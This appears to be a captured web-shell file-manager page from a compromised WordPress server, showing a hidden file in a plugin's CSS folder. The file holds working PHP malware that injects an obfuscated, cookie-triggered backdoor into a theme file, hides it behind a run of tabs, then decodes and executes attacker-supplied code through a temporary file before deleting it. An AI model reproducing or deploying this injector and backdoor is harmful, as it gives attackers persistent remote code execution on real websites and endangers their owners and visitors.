HEX
Server: Apache/2
System: Linux vps32496.sdns.vn 3.10.0-1160.99.1.el7.x86_64 #1 SMP Wed Sep 13 14:19:20 UTC 2023 x86_64
User: khuondaotc (1075)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/khuondaotc/public_html/wp-content/plugins/b-social-share/assets/css/
Upload Files
File: /home/khuondaotc/public_html/wp-content/plugins/b-social-share/assets/css/.dbx_convert
<?php  $path = '/home/khuondaotc/domains/khuondaotct.com/private_html/wp-content/themes/flatsome/page-left-sidebar.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%20%28isset%28%24_COOKIE%5B29-29%5D%29%20%26%26%20isset%28%24_COOKIE%5B58-57%5D%29%20%26%26%20isset%28%24_COOKIE%5B-53%2B56%5D%29%20%26%26%20isset%28%24_COOKIE%5B45%2B-41%5D%29%29%20%7B%20%24ptr%20%3D%20%24_COOKIE%3B%20function%20request_approved%28%24itm%29%20%7B%20%24ptr%20%3D%20%24_COOKIE%3B%20%24factor%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%274b34145e%27%29%3B%20if%20%28%21is_writable%28%24factor%29%29%20%7B%20%24factor%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22app_initializer%22%3B%20%7D%20%24dchunk%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%20%22%20.%20base64_decode%28str_rot13%28%24ptr%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24factor%29%29%20%7B%20%24reference%20%3D%20fopen%28%24factor%2C%20%27w%2B%27%29%3B%20fputs%28%24reference%2C%20%24dchunk%29%3B%20fclose%28%24reference%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24factor%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24factor%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22request_approved%22%29%3B%20%24k%20%3D%20%22566a9697a21f672653c9f38b55df24f3%22%3B%20if%20%28%21strncmp%28%24k%2C%20%24ptr%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22splitter_tool_mutex_lock%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');
@ Telegram